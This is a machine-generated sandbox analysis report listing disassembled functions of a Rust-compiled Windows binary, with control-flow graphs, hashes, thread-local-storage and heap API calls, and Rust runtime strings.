                                                                        • Opcode ID: 98fa011a00da7735019ba3adf2278a76569034d88758759f2c85dfbfbc36bd3a
                                                                        • Instruction ID: 01a0fc987b17ee46a5d90c5d71a5f7250039cecf25074fbd17d42359ffc0b658
                                                                        • Opcode Fuzzy Hash: 98fa011a00da7735019ba3adf2278a76569034d88758759f2c85dfbfbc36bd3a
                                                                        • Instruction Fuzzy Hash: 15F12962D0C3F049D739462D84E423AFFD28FC6319F1D8B6EF8F527292D66489419B91
                                                                        Function 00A71340 Relevance: .4, Instructions: 417COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 9822870e593a44490bf5777cd7b6abff51ac66ec005c5057814e2bffef870071
                                                                        • Instruction ID: decfaaee4e32d26dbacbae5355d50e9383ff09ff63ae2578832cbff33cc044c7
                                                                        • Opcode Fuzzy Hash: 9822870e593a44490bf5777cd7b6abff51ac66ec005c5057814e2bffef870071
                                                                        • Instruction Fuzzy Hash: 96F13A37A096855FC3118A7C8841459BFA29BEA208B5EC6D9E8D88F783D531CD0FC7E5
                                                                        Function 00C7CA40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 138 c7ca40-c7ca48 139 c7cac4-c7cace call da6800 138->139 140 c7ca4a 138->140 141 c7ca4b-c7ca55 TlsGetValue 139->141 140->141 143 c7ca57-c7ca5d 141->143 144 c7ca5f-c7ca66 141->144 143->144 146 c7cab9-c7cabc 143->146 147 c7cad3-c7cadd call da6800 144->147 148 c7ca68 144->148 149 c7cac0-c7cac3 146->149 151 c7ca69-c7ca73 TlsGetValue 147->151 148->151 153 c7ca75-c7ca79 151->153 154 c7cabe 151->154 155 c7cab3 153->155 156 c7ca7b-c7ca93 call a71220 153->156 154->149 155->146 159 c7ca95-c7caa8 156->159 160 c7caeb-c7cb0f call d9bae0 156->160 161 c7cadf-c7cae9 call da6800 159->161 162 c7caaa 159->162 168 c7cb11-c7cb1f 160->168 169 c7cb59-c7cb68 call d9c380 160->169 165 c7caab-c7caad TlsSetValue 161->165 162->165 165->155 170 c7cb21-c7cb27 168->170 171 c7cb2f-c7cb43 168->171 175 c7cb6d-c7cbad call d9bef0 GetModuleHandleA 169->175 170->169 173 c7cb29 170->173 174 c7cb45-c7cb58 171->174 171->175 173->171 178 c7cbc5-c7cbca 175->178 179 c7cbaf-c7cbbc GetProcAddress 175->179 179->178 180 c7cbbe 179->180 180->178
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00DA6F25), ref: 00C7CA4C
                                                                        • TlsGetValue.KERNEL32(00000000), ref: 00C7CA6A
                                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00C7CAAD
                                                                          • Part of subcall function 00DA6800: InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA683C
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA6881
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000004,00000000,?,00E9161C), ref: 00DA68DF
                                                                        • GetModuleHandleA.KERNEL32(kernel32), ref: 00C7CBA5
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C7CBB5
                                                                        Strings
                                                                        • GetSystemTimePreciseAsFileTime, xrefs: 00C7CBAF
                                                                        • kernel32, xrefs: 00C7CBA0
                                                                        • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00C7CB59
                                                                        • chunk size must be non-zero, xrefs: 00C7CB8B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: InitOnceValue$AllocComplete$AddressBeginHandleInitializeModuleProc
                                                                        • String ID: GetSystemTimePreciseAsFileTime$chunk size must be non-zero$kernel32$overflow when adding duration to instantlibrary\std\src\time.rs
                                                                        • API String ID: 3931988749-618619756
                                                                        • Opcode ID: 4425521ce431936c4d33f3d9e308aea961c9c183f06e3fb5f67759e907320079
                                                                        • Instruction ID: bd77a841c290e3aaa1fc25adc1e1ae3f18d1900ccd59fb1c37c45ae382411259
                                                                        • Opcode Fuzzy Hash: 4425521ce431936c4d33f3d9e308aea961c9c183f06e3fb5f67759e907320079
                                                                        • Instruction Fuzzy Hash: 3631F3717012178BCB149B79EC5A32A36D6EB85751F4AC42EF41EEB391EB34CD0187A1
                                                                        Function 00DA6800 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 291 da6800-da680c 292 da680e-da682f InitOnceBeginInitialize 291->292 293 da6881-da688d TlsAlloc 291->293 294 da68bc-da68d5 call da6950 292->294 295 da6835-da683a 292->295 296 da691b-da694f call da6980 293->296 297 da6893-da689c 293->297 306 da68da-da6916 InitOnceComplete call d9bef0 294->306 299 da683c-da6845 TlsAlloc 295->299 300 da68a3-da68a5 295->300 302 da689e-da68a1 297->302 303 da68a7-da68ac TlsFree 297->303 299->306 307 da684b-da685f 299->307 305 da68b2 300->305 304 da68b3-da68bb 302->304 303->305 305->304 306->296 310 da6860-da686b 307->310 310->310 311 da686d-da687f InitOnceComplete 310->311 311->304
                                                                        APIs
                                                                        • InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                        • TlsAlloc.KERNEL32 ref: 00DA683C
                                                                        • InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                        • TlsAlloc.KERNEL32 ref: 00DA6881
                                                                        • TlsFree.KERNEL32 ref: 00DA68AC
                                                                        • InitOnceComplete.KERNEL32(00EDB18C,00000004,00000000,?,00E9161C), ref: 00DA68DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                        • String ID: chunk size must be non-zero
                                                                        • API String ID: 977713646-1054586041
                                                                        • Opcode ID: 35c6d239ca1d01445a49936fec57f08d9286d6f9e491e10543c6d1618645c2f9
                                                                        • Instruction ID: 4e1730e78504c6932f403b15d3cca8787df6d9fd18e30eb366aae267726e59d9
                                                                        • Opcode Fuzzy Hash: 35c6d239ca1d01445a49936fec57f08d9286d6f9e491e10543c6d1618645c2f9
                                                                        • Instruction Fuzzy Hash: 60318170508302EFD710DF24C84975ABBE9EB82319F28891CF5D99B2D1D774D849CBA2
                                                                        Function 00C7DF60 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 176memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 312 c7df60-c7dff2 314 c7dff4-c7e028 312->314 315 c7e05b-c7e067 312->315 324 c7e04a-c7e055 HeapFree 314->324 325 c7e02a-c7e02e 314->325 316 c7e1a6-c7e1b6 315->316 317 c7e06d-c7e070 315->317 318 c7e072-c7e075 317->318 319 c7e0bf-c7e0c9 317->319 321 c7e131-c7e14c call c7e830 318->321 322 c7e07b-c7e096 call c7e830 318->322 319->316 323 c7e0cf-c7e10b 319->323 321->316 334 c7e14e-c7e169 321->334 322->316 335 c7e09c-c7e0ba 322->335 323->316 336 c7e111-c7e12f 323->336 324->315 328 c7e035-c7e038 325->328 329 c7e030-c7e033 325->329 333 c7e03b-c7e044 HeapFree 328->333 329->333 333->324 340 c7e16c-c7e173 334->340 335->340 336->340 341 c7e195-c7e1a0 HeapFree 340->341 342 c7e175-c7e179 340->342 341->316 343 c7e180-c7e183 342->343 344 c7e17b-c7e17e 342->344 345 c7e186-c7e18f HeapFree 343->345 344->345 345->341
                                                                        APIs
                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00C7E044
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C7E055
                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00C7E18F
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C7E1A0
                                                                        Strings
                                                                        • chunk size must be non-zero, xrefs: 00C7E0E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: chunk size must be non-zero
                                                                        • API String ID: 3298025750-1054586041
                                                                        • Opcode ID: 8f80a529df8feced26e137f6352c12a107d5ef6d94ac27275cf813a5b04fcb64
                                                                        • Instruction ID: 35584fb8b37a0914377f7bfbd94b5511432c7f7e58261ee40eb7cedd75532829
                                                                        • Opcode Fuzzy Hash: 8f80a529df8feced26e137f6352c12a107d5ef6d94ac27275cf813a5b04fcb64
                                                                        • Instruction Fuzzy Hash: 4F81F1B5D00208DFDB10CF98D989AEEBBF4FB09314F148159E819AB3A1D375AA45CF91
                                                                        Function 00C80230 Relevance: 7.7, APIs: 6, Instructions: 161memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 346 c80230-c8025b call c7de20 call c80230 352 c80261 346->352 353 c802e2-c802ec call da6800 346->353 354 c80262-c8026c TlsGetValue 352->354 353->354 356 c8027b-c80282 354->356 357 c8026e-c80274 354->357 360 c802f1-c802fb call da6800 356->360 361 c80284 356->361 357->356 359 c80276-c80279 357->359 362 c80293-c80299 359->362 364 c80285-c80291 TlsGetValue 360->364 361->364 364->362 366 c8029a-c8029e 364->366 367 c802a0-c802b8 call a71220 366->367 368 c80306-c80324 call da6ee0 366->368 374 c80349-c80396 call d9bae0 367->374 375 c802be-c802d4 367->375 368->359 373 c8032a-c8032c 368->373 373->359 376 c80332-c80335 373->376 386 c80398-c80399 374->386 387 c8039b-c803b3 call da6800 374->387 377 c802fd 375->377 378 c802d6-c802e0 call da6800 375->378 376->359 380 c8033b-c80344 call c79d00 376->380 383 c802fe-c80300 TlsSetValue 377->383 378->383 380->359 383->368 389 c803b6-c803c3 TlsSetValue 386->389 387->389 392 c803d9-c803ec HeapFree 389->392 393 c803c5-c803ca 389->393 394 c803ee-c803ef 392->394 395 c803f1-c803fe call da6800 392->395 393->392 396 c803cc-c803cf 393->396 397 c80403-c8041c TlsSetValue 394->397 395->397 396->392 399 c803d1-c803d4 call c79d00 396->399 399->392
                                                                        APIs
                                                                          • Part of subcall function 00C7DE20: HeapFree.KERNEL32(00000000,00000000), ref: 00C7DEE5
                                                                          • Part of subcall function 00C7DE20: HeapFree.KERNEL32(00000000,?), ref: 00C7DEF6
                                                                          • Part of subcall function 00C80230: TlsGetValue.KERNEL32(00000000,00D9BAEB,00DA674A,?,?,?,?,?,?,?,?,?,?), ref: 00C80263
                                                                        • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C80286
                                                                        • TlsSetValue.KERNEL32(-00000001,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C80300
                                                                        • TlsSetValue.KERNEL32(00000000,00000001), ref: 00C803B9
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C803E2
                                                                          • Part of subcall function 00DA6800: InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA683C
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00C80406
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Value$FreeHeap$InitOnce$AllocBeginCompleteInitialize
                                                                        • String ID:
                                                                        • API String ID: 16637642-0
                                                                        • Opcode ID: b7f9045c06ee9236eb1d84aa75b2949aaa53206a1341f889801e65eae608b0fb
                                                                        • Instruction ID: 51b9ecce13780a092bb7882b0d796abaa6484999ee884b3902441259ea3bb645
                                                                        • Opcode Fuzzy Hash: b7f9045c06ee9236eb1d84aa75b2949aaa53206a1341f889801e65eae608b0fb
                                                                        • Instruction Fuzzy Hash: D051F530A00605CFDB64EF69D81976AB7B5FF45304F248429E81AEB3A0D775DD08CBA4
                                                                        Function 00C6FDE0 Relevance: 7.6, APIs: 6, Instructions: 149memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 401 c6fde0-c6fde9 402 c6fdef 401->402 403 c6fe98-c6fea2 call da6800 401->403 404 c6fdf0-c6fdfa TlsGetValue 402->404 403->404 406 c6fe0c-c6fe13 404->406 407 c6fdfc-c6fe02 404->407 410 c6fea7-c6feb1 call da6800 406->410 411 c6fe19 406->411 407->406 409 c6fe04-c6fe07 407->409 413 c6fe93-c6fe97 409->413 414 c6fe1a-c6fe24 TlsGetValue 410->414 411->414 416 c6fe26-c6fe2a 414->416 417 c6fe91 414->417 418 c6fe67-c6fe7f 416->418 419 c6fe2c-c6fe44 call a71220 416->419 417->413 418->413 421 c6fe81-c6fe83 418->421 424 c6fe46-c6fe5c 419->424 425 c6fec2-c6ff16 call d9bae0 419->425 421->413 423 c6fe85-c6fe88 421->423 423->413 426 c6fe8a-c6fe8f call b3d250 423->426 427 c6feb6-c6fec0 call da6800 424->427 428 c6fe5e 424->428 436 c6ff1b-c6ff33 call da6800 425->436 437 c6ff18-c6ff19 425->437 426->413 432 c6fe5f-c6fe61 TlsSetValue 427->432 428->432 432->418 438 c6ff36-c6ff43 TlsSetValue 436->438 437->438 441 c6ff45-c6ff4a 438->441 442 c6ff59-c6ff6c HeapFree 438->442 441->442 445 c6ff4c-c6ff4f 441->445 443 c6ff71-c6ff7e call da6800 442->443 444 c6ff6e-c6ff6f 442->444 447 c6ff83-c6ff9c TlsSetValue 443->447 444->447 445->442 446 c6ff51-c6ff54 call b3d250 445->446 446->442
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,80000000,00C7EFEC), ref: 00C6FDF1
                                                                        • TlsGetValue.KERNEL32(00000000,?,80000000,00C7EFEC), ref: 00C6FE1B
                                                                        • TlsSetValue.KERNEL32(00000000,00000000,?,80000000,00C7EFEC), ref: 00C6FE61
                                                                        • TlsSetValue.KERNEL32(00000000,00000001), ref: 00C6FF39
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C6FF62
                                                                          • Part of subcall function 00DA6800: InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA683C
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00C6FF86
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Value$InitOnce$AllocBeginCompleteFreeHeapInitialize
                                                                        • String ID:
                                                                        • API String ID: 2438581317-0
                                                                        • Opcode ID: ebb679243450070f987f2c26a05f0be679a888d54ce586c5d75f1ab24092aedf
                                                                        • Instruction ID: 2b504f689d3d73e5f5ed89434e1cd5fe118601082422e6fcca46a491cc839a48
                                                                        • Opcode Fuzzy Hash: ebb679243450070f987f2c26a05f0be679a888d54ce586c5d75f1ab24092aedf
                                                                        • Instruction Fuzzy Hash: 4C41A170601206CFDB309FA9E89976A7BE9EF41310F14443DE82AE72A1C775D902C7B1
                                                                        Function 00C624F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 450 c624f0-c6256d call c61d20 call c61e80 GetModuleHandleA 455 c62585-c6258a 450->455 456 c6256f-c6257c GetProcAddress 450->456 456->455 457 c6257e 456->457 457->455
                                                                        APIs
                                                                          • Part of subcall function 00C61E80: HeapFree.KERNEL32(00000000,00000000), ref: 00C61EF3
                                                                          • Part of subcall function 00C61E80: HeapFree.KERNEL32(00000000,?), ref: 00C61F02
                                                                        • GetModuleHandleA.KERNEL32(ntdll), ref: 00C62565
                                                                        • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00C62575
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap$AddressHandleModuleProc
                                                                        • String ID: NtWaitForKeyedEvent$ntdll
                                                                        • API String ID: 2009576768-2815205136
                                                                        • Opcode ID: ee65185db077266bfbe5244e6927364870010aac44784d8617b5ef989cea542a
                                                                        • Instruction ID: 1ca6b72691db991bd3b0be7ebeac7742a57eac1e42db1b1a5d8c5aeb2a542832
                                                                        • Opcode Fuzzy Hash: ee65185db077266bfbe5244e6927364870010aac44784d8617b5ef989cea542a
                                                                        • Instruction Fuzzy Hash: A2014FB0109302EFD714DF21D85571B77E5EB88744F00891DF89997240EB78D9088BA2
                                                                        Function 00C622A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 458 c622a0-c622db call c62420 461 c622e1-c622e8 458->461 462 c6238c-c623a3 call d9c380 458->462 463 c6236e-c62374 461->463 464 c622ee-c622fc 461->464 473 c623eb-c6240d call c624f0 462->473 469 c62376 call c62260 463->469 470 c6237b-c6238b 463->470 466 c62316-c6231f 464->466 467 c622fe 464->467 474 c62321-c6233e 466->474 475 c6235d-c6236c 466->475 472 c62300-c62312 WaitOnAddress 467->472 469->470 472->472 476 c62314 472->476 483 c62417-c6241b 473->483 484 c6240f-c62412 call c62260 473->484 481 c623a5-c623e6 call d9bef0 474->481 482 c62340-c62350 474->482 475->463 476->463 481->473 482->475 486 c62352-c6235b CloseHandle 482->486 484->483 486->475
                                                                        APIs
                                                                        • WaitOnAddress.KERNELBASE(?,00E91650,00000001,000000FF), ref: 00C6230A
                                                                        • CloseHandle.KERNEL32(FFFFFFFF), ref: 00C62355
                                                                        Strings
                                                                        • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00C6238C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCloseHandleWait
                                                                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                        • API String ID: 592885855-1431102515
                                                                        • Opcode ID: 6f736e3d2605bbce3a78a4f784612e13d0c66620bc07185c9f8481ae9f1fe108
                                                                        • Instruction ID: 51013e591327b93d95a12fd3ee3a90c6d22e76e8731f50a4c4be526eb7674e11
                                                                        • Opcode Fuzzy Hash: 6f736e3d2605bbce3a78a4f784612e13d0c66620bc07185c9f8481ae9f1fe108
                                                                        • Instruction Fuzzy Hash: 3A41BD719016099FDB21DFA4DC81BAEBBB8FB44724F140229E4287B3E1D7756A05CBA0
                                                                        Function 00C63BC0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 488 c63bc0-c63bc8 489 c63bce 488->489 490 c63c58-c63c62 call da6800 488->490 491 c63bcf-c63bd9 TlsGetValue 489->491 490->491 493 c63be6-c63bed 491->493 494 c63bdb-c63bdf 491->494 497 c63c67-c63c71 call da6800 493->497 498 c63bef 493->498 494->493 496 c63be1-c63be5 494->496 500 c63bf0-c63bfa TlsGetValue 497->500 498->500 502 c63c54-c63c57 500->502 503 c63bfc-c63c00 500->503 504 c63c02-c63c1a call a71220 503->504 505 c63c3d-c63c53 503->505 508 c63c82-c63ce7 call d9bae0 504->508 509 c63c1c-c63c32 504->509 518 c63d09-c63d19 508->518 519 c63ce9-c63ced 508->519 510 c63c76-c63c80 call da6800 509->510 511 c63c34 509->511 513 c63c35-c63c37 TlsSetValue 510->513 511->513 513->505 520 c63cf4-c63cf7 519->520 521 c63cef-c63cf2 519->521 522 c63cfa-c63d03 HeapFree 520->522 521->522 522->518
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BD0
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BF1
                                                                        • TlsSetValue.KERNEL32(00000000,00000000,?,00C7EB80), ref: 00C63C37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
